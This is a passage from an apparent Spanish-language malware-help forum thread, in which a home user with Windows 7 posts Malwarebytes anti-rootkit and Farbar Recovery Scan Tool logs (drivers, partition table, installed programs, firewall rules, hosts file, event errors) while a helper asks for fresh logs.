\SystemRoot\system32\mcupdate_GenuineIntel.dll
\SystemRoot\system32\PSHED.dll
\SystemRoot\system32\BOOTVID.dll
\SystemRoot\system32\CLFS.SYS
\SystemRoot\system32\CI.dll
\SystemRoot\system32\drivers\Wdf01000.sys
\SystemRoot\system32\drivers\WDFLDR.SYS
\SystemRoot\system32\drivers\ACPI.sys
\SystemRoot\system32\drivers\WMILIB.SYS
\SystemRoot\system32\drivers\msisadrv.sys
\SystemRoot\system32\drivers\pci.sys
\SystemRoot\system32\drivers\vdrvroot.sys
\SystemRoot\System32\drivers\partmgr.sys
\SystemRoot\system32\drivers\volmgr.sys
\SystemRoot\System32\drivers\volmgrx.sys
\SystemRoot\system32\drivers\intelide.sys
\SystemRoot\system32\drivers\PCIIDEX.SYS
\SystemRoot\System32\drivers\mountmgr.sys
\SystemRoot\system32\drivers\atapi.sys
\SystemRoot\system32\drivers\ataport.SYS
\SystemRoot\system32\drivers\amdxata.sys
\SystemRoot\system32\drivers\fltmgr.sys
\SystemRoot\system32\drivers\fileinfo.sys
\SystemRoot\System32\Drivers\Ntfs.sys
\SystemRoot\System32\Drivers\msrpc.sys
\SystemRoot\System32\Drivers\ksecdd.sys
\SystemRoot\System32\Drivers\cng.sys
\SystemRoot\System32\drivers\pcw.sys
\SystemRoot\System32\Drivers\Fs_Rec.sys
\SystemRoot\system32\drivers\ndis.sys
\SystemRoot\system32\drivers\NETIO.SYS
\SystemRoot\System32\Drivers\ksecpkg.sys
\SystemRoot\System32\drivers\tcpip.sys
\SystemRoot\System32\drivers\fwpkclnt.sys
\SystemRoot\system32\drivers\vmstorfl.sys
\SystemRoot\system32\drivers\volsnap.sys
\SystemRoot\System32\Drivers\spldr.sys
\SystemRoot\System32\drivers\rdyboost.sys
\SystemRoot\System32\Drivers\mup.sys
\SystemRoot\System32\drivers\hwpolicy.sys
\SystemRoot\System32\DRIVERS\fvevol.sys
\SystemRoot\system32\drivers\disk.sys
\SystemRoot\system32\drivers\CLASSPNP.SYS
\SystemRoot\system32\DRIVERS\cdrom.sys
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\System32\drivers\vga.sys
\SystemRoot\System32\drivers\VIDEOPRT.SYS
\SystemRoot\System32\drivers\watchdog.sys
\SystemRoot\System32\DRIVERS\RDPCDD.sys
\SystemRoot\system32\drivers\rdpencdd.sys
\SystemRoot\system32\drivers\rdprefmp.sys
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\system32\DRIVERS\tdx.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\system32\drivers\afd.sys
\SystemRoot\System32\DRIVERS\netbt.sys
\SystemRoot\system32\DRIVERS\wfplwf.sys
\SystemRoot\system32\DRIVERS\pacer.sys
\SystemRoot\system32\DRIVERS\netbios.sys
\SystemRoot\system32\DRIVERS\wanarp.sys
\SystemRoot\system32\drivers\termdd.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\drivers\nsiproxy.sys
\SystemRoot\system32\drivers\mssmbios.sys
\SystemRoot\System32\drivers\discache.sys
\SystemRoot\system32\drivers\csc.sys
\SystemRoot\System32\Drivers\dfsc.sys
\SystemRoot\system32\DRIVERS\blbdrive.sys
\SystemRoot\system32\DRIVERS\tunnel.sys
\SystemRoot\system32\drivers\intelppm.sys
\SystemRoot\system32\DRIVERS\igdkmd32.sys
\SystemRoot\System32\drivers\dxgkrnl.sys
\SystemRoot\System32\drivers\dxgmms1.sys
\SystemRoot\system32\DRIVERS\HDAudBus.sys
\SystemRoot\system32\DRIVERS\Rt86win7.sys
\SystemRoot\system32\drivers\usbuhci.sys
\SystemRoot\system32\drivers\USBPORT.SYS
\SystemRoot\system32\drivers\usbehci.sys
\SystemRoot\system32\drivers\wmiacpi.sys
\SystemRoot\system32\DRIVERS\CompositeBus.sys
\SystemRoot\system32\DRIVERS\AgileVpn.sys
\SystemRoot\system32\DRIVERS\rasl2tp.sys
\SystemRoot\system32\DRIVERS\ndistapi.sys
\SystemRoot\system32\DRIVERS\ndiswan.sys
\SystemRoot\system32\DRIVERS\raspppoe.sys
\SystemRoot\system32\DRIVERS\raspptp.sys
\SystemRoot\system32\DRIVERS\rassstp.sys
\SystemRoot\system32\DRIVERS\rdpbus.sys
\SystemRoot\system32\DRIVERS\kbdclass.sys
\SystemRoot\system32\DRIVERS\mouclass.sys
\SystemRoot\system32\drivers\swenum.sys
\SystemRoot\system32\drivers\ks.sys
\SystemRoot\system32\DRIVERS\umbus.sys
\SystemRoot\system32\drivers\usbhub.sys
\SystemRoot\System32\Drivers\NDProxy.SYS
\SystemRoot\system32\drivers\HdAudio.sys
\SystemRoot\system32\drivers\portcls.sys
\SystemRoot\system32\drivers\drmk.sys
\SystemRoot\system32\DRIVERS\hidusb.sys
\SystemRoot\system32\DRIVERS\HIDCLASS.SYS
\SystemRoot\system32\DRIVERS\HIDPARSE.SYS
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\system32\DRIVERS\mouhid.sys
\SystemRoot\system32\DRIVERS\kbdhid.sys
\SystemRoot\System32\Drivers\crashdmp.sys
\SystemRoot\System32\Drivers\dump_dumpata.sys
\SystemRoot\System32\Drivers\dump_atapi.sys
\SystemRoot\System32\Drivers\dump_dumpfve.sys
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\drivers\Dxapi.sys
\SystemRoot\system32\DRIVERS\monitor.sys
\SystemRoot\System32\TSDDD.dll
\SystemRoot\System32\cdd.dll
\SystemRoot\system32\drivers\luafv.sys
\SystemRoot\system32\DRIVERS\lltdio.sys
\SystemRoot\system32\DRIVERS\nwifi.sys
\SystemRoot\system32\DRIVERS\ndisuio.sys
\SystemRoot\system32\DRIVERS\rspndr.sys
\SystemRoot\system32\drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\bowser.sys
\SystemRoot\System32\drivers\mpsdrv.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\system32\DRIVERS\mrxsmb10.sys
\SystemRoot\system32\DRIVERS\mrxsmb20.sys
\SystemRoot\system32\drivers\peauth.sys
\SystemRoot\System32\DRIVERS\srvnet.sys
\SystemRoot\System32\drivers\tcpipreg.sys
\SystemRoot\system32\drivers\spsys.sys
\SystemRoot\System32\DRIVERS\srv2.sys
\SystemRoot\System32\DRIVERS\srv.sys
\??\C:\Windows\system32\drivers\mbamchameleon.sys
\??\C:\Windows\system32\drivers\7372779E.sys
\Windows\System32\ntdll.dll
\Windows\System32\smss.exe
\Windows\System32\apisetschema.dll
----------- End -----------
Done!

Scan started
Database versions:
  main:    v2020.04.27.04
  rootkit: v2020.04.27.04

<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffffff85e5b160, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85e5ccc8, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffffff85e5b160, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff85d84918, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffffff85d82030, DeviceName: \Device\Ide\IdeDeviceP2T0L0-2\, DriverName: \Driver\atapi\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
Done!
Drive 0
This is a System drive
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: F362F362

Partition information:

    Partition 0 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 2048  Numsec = 204800
    Partition is bootable
    Partition file system is NTFS

    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 206848  Numsec = 312371200
    Partition is not bootable
    Partition file system is NTFS

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable

Disk Size: 160041885696 bytes
Sector size: 512 bytes

Done!
Infected: C:\Windows\System32\drivers\etc\hosts --> [RiskWare.DontStealOurSoftware]
Infected: C:\Windows\System32\drivers\etc\hosts --> [RiskWare.DontStealOurSoftware]
Infected: C:\Windows\System32\drivers\etc\hosts --> [RiskWare.DontStealOurSoftware]
Scan finished
Creating System Restore point...
Cleaning up...
Removal successful. No system shutdown is required.
=======================================


Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-1-206848-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removal finished

Ponme dos nuevos logs con Fabar

==================== SigCheck ============================

(No existe una corrección automática para los archivos que no pasan la verificación.)


LastRegBack: 2020-04-27 08:34
==================== Final de FRST.txt ========================

Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x86) Versión: 26-04-2020
Ejecutado por Familia Landaeta (28-04-2020 10:10:28)
Ejecutado desde C:\Users\Familia Landaeta\Desktop
Windows 7 Ultimate Service Pack 1 (X86) (2016-09-12 15:27:10)
Modo de Inicio: Normal
==========================================================


==================== Cuentas: =============================

Administrador (S-1-5-21-1692793609-910991690-2205039242-500 - Administrator - Disabled)
Familia Landaeta (S-1-5-21-1692793609-910991690-2205039242-1000 - Administrator - Enabled) => C:\Users\Familia Landaeta
HomeGroupUser$ (S-1-5-21-1692793609-910991690-2205039242-1002 - Limited - Enabled)
Invitado (S-1-5-21-1692793609-910991690-2205039242-501 - Limited - Disabled)

==================== Centro de Seguridad ========================

(Si una entrada es incluida en el fixlist, será eliminada.)


==================== Programas instalados ======================

(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)

Adobe Acrobat Reader DC - Español (HKLM\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 19.010.20098 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Akamai) (Version:  - Akamai Technologies, Inc)
CCleaner (HKLM\...\CCleaner) (Version: 5.65 - Piriform)
Cheating-Death 4.33.4 (HKLM\...\Cheating-Death) (Version:  - )
Counter-Strike 1.6 (HKLM\...\Counter-Strike 1.6_is1) (Version: Counter-Strike 1.6 No Steam - KingSOFT DVD)
Epson E-Web Print (HKLM\...\{6BF9F374-EC67-4808-A90C-F127DE6D989D}) (Version: 1.23.0000 - SEIKO EPSON CORPORATION)
EPSON L355 Series Printer Uninstall (HKLM\...\EPSON L355 Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
Epson Software Updater (HKLM\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
FIFA 14 versión 1.1 (HKLM\...\{A119D7FE-EF42-497D-A87A-C27F106E883E}_is1) (Version: 1.1 - )
Google Chrome (HKLM\...\Google Chrome) (Version: 81.0.4044.129 - Google LLC)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
Hero Editor V0.96 (C:\Program Files\Hero Editor\) (HKLM\...\ST6UNST #2) (Version:  - )
Hero Editor V0.96 (HKLM\...\ST6UNST #1) (Version:  - )
Intel® Processor Identification Utility (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Utilidad Intel® para identificación de procesadores 6.3.0404) (Version: 6.3.0404 - Intel Corporation)
Java 8 Update 181 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
League of Legends (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Riot Game league_of_legends.live) (Version:  - Riot Games, Inc)
Microsoft .NET Framework 4.6.1 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM\...\{402ED4A1-8F5B-387A-8688-997ABF58B8F2}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML4 Parser (HKLM\...\{01501EBA-EC35-4F9F-8889-3BE346E5DA13}) (Version: 1.0.0 - Microsoft Game Studios)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Utilidad Intel® para identificación de procesadores (HKLM\...\{285B6614-95B6-4F8E-BE81-CFAE1DB22D57}) (Version: 6.3.0404 - Intel Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WinRAR 4.20 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
X-Mouse Button Control 2.19 (HKLM\...\X-Mouse Button Control) (Version: 2.19 - Highresolution Enterprises)

==================== Personalizado CLSID (Lista blanca): ==============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

CustomCLSID: HKU\S-1-5-21-1692793609-910991690-2205039242-1000_Classes\CLSID\{305CA226-D286-468e-B848-2B2E8E697B74}\Shell\Open\Command -> C:\Users\Familia Landaeta\AppData\Local\Akamai\ControlPanel.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
ShellExecuteHooks: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal) [Archivo no firmado]
ContextMenuHandlers4: [MSSE] -> {0365FE2C-F183-4091-AC82-BFC39FB75C49} =>  -> Ningún archivo
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2010-08-25] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal) [Archivo no firmado]

==================== Codecs (Lista blanca) ====================

==================== Accesos directos & WMI ========================

==================== Módulos cargados (Lista blanca) =============

2016-09-12 11:32 - 2012-06-09 19:50 - 000167936 _____ (Alexander Roshal) [Archivo no firmado] C:\Program Files\WinRAR\rarext.dll
2016-12-07 14:44 - 2016-12-07 14:44 - 000308736 _____ (IntelleSoft) [Archivo no firmado] C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\BugTrapU.dll
2016-09-21 11:56 - 2016-09-21 11:56 - 000097280 _____ (Microsoft Corporation) [Archivo no firmado] C:\Windows\WinSxS\x86_microsoft.vc80.atl_1fc8b3b9a1e18e3b_8.0.50727.4053_none_d1c738ec43578ea1\ATL80.DLL

==================== Alternate Data Streams (Lista blanca) ========

==================== Modo Seguro (Lista blanca) ==================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Asociación (Lista blanca) =================

==================== Internet Explorer sitios de confianza/restringidos ==========

(Si una entrada es incluida en el fixlist, será eliminada del registro.)

IE restricted site: HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\xnxx.com -> www.xnxx.com

==================== Hosts contenido: =========================

(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)

2009-07-13 22:04 - 2020-04-27 11:30 - 000000885 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1       localhost
0.0.0.0 test.bypclife

==================== Otras Áreas ===========================

(Actualmente no existe una corrección automática para esta sección.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 37.120.145.234 - 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall de Windows está habilitado.

==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==

(Si una entrada es incluida en el fixlist, será eliminada.)

MSCONFIG\startupreg: Akamai NetSession Interface => "C:\Users\Familia Landaeta\AppData\Local\Akamai\netsession_win.exe"

==================== Reglas de firewall (Lista blanca) ================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

FirewallRules: [{4C2EA450-FCEB-48E3-8469-496CA762A139}] => (Allow) E:\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{AC0AB0E1-512E-4FA0-AFB0-88FEAB7DBB8A}] => (Allow) E:\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [TCP Query User{46EE030B-7A57-4E3F-AB8B-9F0DBB3110AC}C:\program files\counter-strike 1.6\hl.exe] => (Allow) C:\program files\counter-strike 1.6\hl.exe (Valve) [Archivo no firmado]
FirewallRules: [UDP Query User{D653C05C-F715-45BF-BE04-7DF15D930FA2}C:\program files\counter-strike 1.6\hl.exe] => (Allow) C:\program files\counter-strike 1.6\hl.exe (Valve) [Archivo no firmado]
FirewallRules: [{FBBEBCD5-A2F7-4A06-B4E0-1CC8755C1FE8}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{09013516-0F08-4C86-89EC-792743B3C402}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [UDP Query User{C5723237-617D-487F-AA6B-1051735D0E52}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [TCP Query User{EB69B0BF-CEBA-4A76-A71B-5B54873F6315}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [UDP Query User{F36ED7B7-BE13-4F27-B4D4-7AC9C3F80504}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [{E27126AC-A01E-4EA3-B035-9736657180B7}] => (Allow) C:\AeriaGames\Aura Kingdom-ES\game.bin (X-Legend Entertainment CO., LTD. -> X-LEGEND Entertaimment)
FirewallRules: [{7AB9F7C9-0BAF-45D6-9BE3-0CBC5A30A82D}] => (Allow) C:\AeriaGames\Aura Kingdom-ES\game.bin (X-Legend Entertainment CO., LTD. -> X-LEGEND Entertaimment)
FirewallRules: [TCP Query User{25A2BA8A-28C5-4E9B-A6EC-0E14FA44696A}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [UDP Query User{FC10D8A2-84A6-486E-9B44-4D429630E79C}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [TCP Query User{EC824BA9-E1C5-4845-9D9F-CEAAC0D6906D}C:\program files\universegamers\gunzv10.1\uggunz.exe] => (Allow) C:\program files\universegamers\gunzv10.1\uggunz.exe (Universe Gamers) [Archivo no firmado]
FirewallRules: [UDP Query User{FBFA65E9-D662-4EA6-94C8-5B65E28D736F}C:\program files\universegamers\gunzv10.1\uggunz.exe] => (Allow) C:\program files\universegamers\gunzv10.1\uggunz.exe (Universe Gamers) [Archivo no firmado]
FirewallRules: [TCP Query User{B3269DA9-6177-4678-B55E-C9B931C1229C}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [UDP Query User{2FFF9BF0-13C8-42B3-A231-6751376620F7}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [{2C916BF5-DB28-4C44-8AFD-D827448F82BB}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{7DE87355-A05F-410A-8AAE-AD72211BAAE8}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{1F09387B-EAC1-494C-9728-5D3C7724F953}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{DC393E86-4829-46F1-B277-E2E6F1B3B57D}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{39743059-F121-4032-AE0A-5C62AAD34E8F}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Puntos de Restauración =========================

No se pudieron listar los puntos de restauración
Comprobar el servicio "winmgmt" o reparar WMI.


==================== Dispositivos defectuosos en el Administrador de dispositivos ============


==================== Errores del registro de eventos: ========================

Errores de aplicación:
==================
Error: (04/28/2020 09:51:48 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Error de activación de la licencia de Windows. Error 0x00000000.

Error: (04/28/2020 09:51:48 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
0x800401F9

Error: (04/27/2020 12:02:23 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Error de activación de la licencia de Windows. Error 0x00000000.

Error: (04/27/2020 12:02:23 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
0x800401F9

Error: (04/27/2020 11:45:54 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Error de activación de la licencia de Windows. Error 0x00000000.

Error: (04/27/2020 11:45:54 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
0x800401F9

Error: (04/27/2020 11:29:47 AM) (Source: VSS) (EventID: 8194) (User: )
Description: Error del Servicio de instantáneas de volumen: error inesperado al consultar la interfaz IVssWriterCallback. HR = 0x80070005, Acceso denegado.
.
A menudo ocurre por una configuración de seguridad incorrecta en el proceso de escritura o de solicitud.


Operación:
   Recopilando datos del escritor

Contexto:
   Id. de clase del escritor: {e8132975-6f93-4464-a53e-1050253ae220}
   Nombre del escritor: System Writer
   Id. de instancia del escritor: {27343c29-13b3-48b1-92d6-ae3d859bcda2}

Error: (04/27/2020 08:09:01 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Error de activación de la licencia de Windows. Error 0x00000000.


Errores del sistema:
=============
Error: (04/28/2020 09:52:27 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1083" al intentar iniciar el servicio winmgmt con argumentos "" para ejecutar el servidor:
{8BC3F05E-D86B-11D0-A075-00C04FB68820}

Error: (04/28/2020 09:52:21 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1083" al intentar iniciar el servicio winmgmt con argumentos "" para ejecutar el servidor:
{8BC3F05E-D86B-11D0-A075-00C04FB68820}

Error: (04/28/2020 09:52:19 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1083" al intentar iniciar el servicio winmgmt con argumentos "" para ejecutar el servidor:
{8BC3F05E-D86B-11D0-A075-00C04FB68820}

Error: (04/28/2020 09:52:15 AM) (Source: WMPNetworkSvc) (EventID: 14332) (User: )
Description: El servicio "WMPNetworkSvc" no se puede iniciar correctamente debido al error "0x80004005" en CoCreateInstance(CLSID_UPnPDeviceFinder). Compruebe que el servicio UPnPHost esté en ejecución y que el componente UPnPHost de Windows esté instalado correctamente.

Error: (04/28/2020 09:51:52 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Aplicación auxiliar IP depende del servicio Windows Management Instrumentation, el cual no pudo iniciarse debido al siguiente error: 
Este servicio se configuró para ejecutarse en un programa ejecutable, pero el programa no implementa el servicio.

Error: (04/28/2020 09:51:51 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Centro de seguridad depende del servicio Windows Management Instrumentation, el cual no pudo iniciarse debido al siguiente error: 
Este servicio se configuró para ejecutarse en un programa ejecutable, pero el programa no implementa el servicio.

Error: (04/27/2020 12:42:21 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio MBAMService depende del servicio Windows Management Instrumentation, el cual no pudo iniciarse debido al siguiente error: 
Este servicio se configuró para ejecutarse en un programa ejecutable, pero el programa no implementa el servicio.

Error: (04/27/2020 12:27:41 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: No se pudo registrar el nombre "WORKGROUP      :1d" en la interfaz con dirección IP 192.168.1.2.
El equipo la con dirección IP 192.168.1.6 no admite el nombre reclamado por este equipo.


Windows Defender:
===================================
Date: 2020-04-16 10:04:25.437
Description: 
El examen de Windows Defender se detuvo antes de completarse.
Id. de examen:{D89403F0-B93D-475E-9BE2-D2E52245BCDF}
Tipo de examen:AntiSpyware
Parámetros de examen:Examen rápido
Usuario:FamiliaLandaeta\Familia Landaeta

==================== Información de la memoria =========================== 

BIOS: American Megatrends Inc. 6.07 03/21/2011
Placa base: FOXCONN 2A8C
Procesador: Pentium(R) Dual-Core CPU E5800 @ 3.20GHz
Porcentaje de memoria en uso: 94%
RAM física total: 2013.24 MB
RAM física disponible: 115.58 MB
Virtual total: 4026.48 MB
Virtual disponible: 1919.84 MB

==================== Unidades ================================

Drive c: () (Fixed) (Total:148.95 GB) (Free:51.43 GB) NTFS

\\?\Volume{459fd2d9-792a-11e6-a962-806e6f6e6963}\ (Reservado para el sistema) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS

==================== MBR & Tabla de particiones ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 149.1 GB) (Disk ID: F362F362)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=149 GB) - (Type=07 NTFS)

==================== Final  Addition.txt =======================

Solo me pusiste el reporte adicción.txt…falta el otro

vuelvo a pegar ambos logs

    Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x86) Versión: 26-04-2020
    Ejecutado por Familia Landaeta (administrador) sobre FAMILIALANDAETA (Hewlett-Packard HP 500B Microtower) (28-04-2020 12:32:55)
    Ejecutado desde C:\Users\Familia Landaeta\Desktop
    Perfiles cargados: Familia Landaeta (Perfiles disponibles: Familia Landaeta)
    Platform: Windows 7 Ultimate Service Pack 1 (X86) Idioma: Español (España, internacional)
